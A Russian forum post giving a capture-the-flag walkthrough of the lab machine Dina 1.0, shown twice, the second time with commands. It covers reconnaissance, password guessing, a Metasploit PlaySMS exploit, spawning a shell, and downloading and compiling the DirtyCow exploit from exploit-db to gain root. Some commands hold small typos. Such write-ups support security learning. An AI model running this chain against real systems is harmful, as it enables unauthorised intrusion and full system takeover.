Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060, буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.
Взяли несложную Dina 1.0.
Для начала, как обычно немного разведки:
Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:
Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:
Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.
Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.
Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.
Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.
Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:
По описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:
Запускаем:
Две трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:
Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:
Переименуем и скомпилируем:
Запускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:
Переподключаемся к шеллу и меняем пользователя на firefart:
Теперь осталось взять флаг:
На этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.
P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)
Взяли несложную Dina 1.0.
Для начала, как обычно немного разведки:
Код:
netdiscover
Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:
Код:
nmap –sV –A 192.168.0.107
Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:
Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.
Код:
nikto –h 192.168.0.107
Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.
Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.
Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.
Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:
Код:
msfconsole
search playsms
По описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:
Запускаем:
Код:
exploit
Две трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:
Код:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:
Код:
wget https://www.exploit-db.com/download/40839.c --no-check-certificate
Переименуем и скомпилируем:
Код:
gcc -pthread dirty.c -o dirty –lcrypt
Запускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:
Код:
./dirthy
Переподключаемся к шеллу и меняем пользователя на firefart:
Код:
su
Теперь осталось взять флаг:
Код:
cd /root
cat flag.txt
На этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.
P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)